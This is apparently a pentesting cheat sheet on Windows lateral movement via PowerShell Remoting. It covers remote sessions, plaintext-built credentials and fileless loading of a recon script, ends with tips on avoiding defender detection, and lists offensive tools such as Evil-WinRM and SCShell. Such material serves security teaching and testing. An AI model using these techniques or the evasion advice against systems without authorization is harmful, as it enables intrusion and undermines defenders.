Getting Access

Hack Responsibly.

Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.

Lateral Movement

PowerShell Remoting

#Enable PowerShell Remoting on the current machine: starts WinRM, creates the HTTP listener (TCP 5985) and adds the firewall exception (Needs Admin Access)
Enable-PSRemoting

#Entering or starting a new PSSession on the target. By default only members of the target's Administrators or Remote Management Users groups may connect (Needs Admin Access)
$sess = New-PSSession -ComputerName $ComputerName
Enter-PSSession -ComputerName $ComputerName
#-OR- attach to a session object you already created (-Session takes the PSSession, not its name)
Enter-PSSession -Session $sess

Remote Code Execution with PS Credentials

#Build a PSCredential from a plaintext password so no interactive prompt is needed ($Password, $DomainName and $User are your own variables)
$SecPassword = ConvertTo-SecureString $Password -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential("$DomainName\$User", $SecPassword)
Invoke-Command -ComputerName $ComputerName -Credential $Cred -ScriptBlock {whoami /all}

Import a PowerShell module and execute its functions remotely

#Create a session, then run a local .ps1 inside it. -FilePath reads the script locally and executes it remotely, so the functions it defines are loaded into the session without touching the target's disk (-ComputerName and -Session cannot be combined in one call)
$sess = New-PSSession -ComputerName $ComputerName -Credential $Cred
Invoke-Command -Session $sess -FilePath $PSModule_FilePath

#Interact with the session; the functions loaded above can now be called by name
Enter-PSSession -Session $sess

Executing Remote Stateful commands

#Create a new session
$sess = New-PSSession -ComputerName $ComputerName

#Execute command on the session
Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}

#Read the variable back in a second call. Because a PSSession keeps its runspace alive between Invoke-Command calls, $ps still holds the process list, which a plain Invoke-Command -ComputerName (new runspace each time) would not
Invoke-Command -Session $sess -ScriptBlock {$ps}
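The snippets above are the individual steps; the following is an added worked example (not from the original page) that strings them together into one session: reachability check, credential build, privilege check, loading a local script into the session, reusing its state, and cleanup. The hostname, domain, user, password, the script path C:\Tools\Invoke-Recon.ps1 and the Invoke-Recon function it is assumed to define are all placeholders.

```powershell
# Added example: end-to-end PSRemoting workflow over a single reusable session.
# $Target, $Domain, $User, $Password and $ModulePath are assumed placeholder values.
$Target     = 'WS01.corp.local'
$Domain     = 'CORP'
$User       = 'jdoe'
$Password   = 'P@ssw0rd!'
$ModulePath = 'C:\Tools\Invoke-Recon.ps1'   # assumed: a local script that defines Invoke-Recon

# 1. Confirm WinRM answers before spending a logon attempt (default HTTP listener is TCP 5985).
try {
    Test-WSMan -ComputerName $Target -ErrorAction Stop | Out-Null
} catch {
    Write-Warning "WinRM not reachable on $Target : $($_.Exception.Message)"
    return
}

# 2. Build the PSCredential without an interactive prompt.
$SecPassword = ConvertTo-SecureString $Password -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential("$Domain\$User", $SecPassword)

# 3. One persistent session; every remote step below reuses it.
$sess = New-PSSession -ComputerName $Target -Credential $Cred

# 4. Who are we on the target, and is the token high-integrity?
Invoke-Command -Session $sess -ScriptBlock {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    [PSCustomObject]@{
        Host  = $env:COMPUTERNAME
        User  = $id.Name
        Admin = ([Security.Principal.WindowsPrincipal]$id).IsInRole(
                    [Security.Principal.WindowsBuiltInRole]::Administrator)
    }
}

# 5. Load the local script into the remote runspace. -FilePath is read on this host
#    and executed in $sess, so its functions exist remotely with nothing written to disk.
Invoke-Command -Session $sess -FilePath $ModulePath

# 6. State persists between calls: set a variable in one call, read it in the next,
#    and call the function loaded in step 5 by name.
Invoke-Command -Session $sess -ScriptBlock { $procs = Get-Process | Sort-Object WS -Descending }
Invoke-Command -Session $sess -ScriptBlock { $procs | Select-Object -First 5 Name, Id, WS }
Invoke-Command -Session $sess -ScriptBlock { Invoke-Recon }   # assumed function from $ModulePath

# 7. Drop to an interactive prompt in the same session when needed ('exit' returns here),
#    then tear the session down: an idle wsmprovhost.exe is an easy thing for defenders to spot.
# Enter-PSSession -Session $sess
Remove-PSSession -Session $sess
```

Two caveats worth keeping in mind when running this: the remote side holds a network logon, so commands inside $sess cannot authenticate onward to a third host with the user's credentials (the classic double-hop problem) unless you pass -Credential again or enable CredSSP; and every New-PSSession and Invoke-Command leaves event 4624 (logon type 3) on the target plus Microsoft-Windows-WinRM operational log entries, so keep session count low and remove sessions when finished.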

Useful Tools

  • Powercat: netcat written in PowerShell; provides tunneling, relay and port-forwarding capabilities.

  • SCShell: fileless lateral movement tool that relies on ChangeServiceConfigA to run a command by repointing an existing service's binary path.

  • Evil-Winrm: the ultimate WinRM shell for hacking/pentesting.

  • RunasCs: C# and open-source version of the Windows built-in runas.exe.
